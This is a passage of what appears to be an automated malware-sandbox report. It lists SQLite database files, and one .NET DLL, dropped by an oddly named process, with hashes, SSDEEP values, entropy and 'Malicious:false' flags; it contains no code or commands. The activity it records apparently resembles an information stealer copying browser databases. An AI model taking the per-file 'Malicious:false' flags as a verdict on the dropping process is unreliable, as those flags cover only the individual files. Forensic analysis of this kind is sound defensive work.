                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
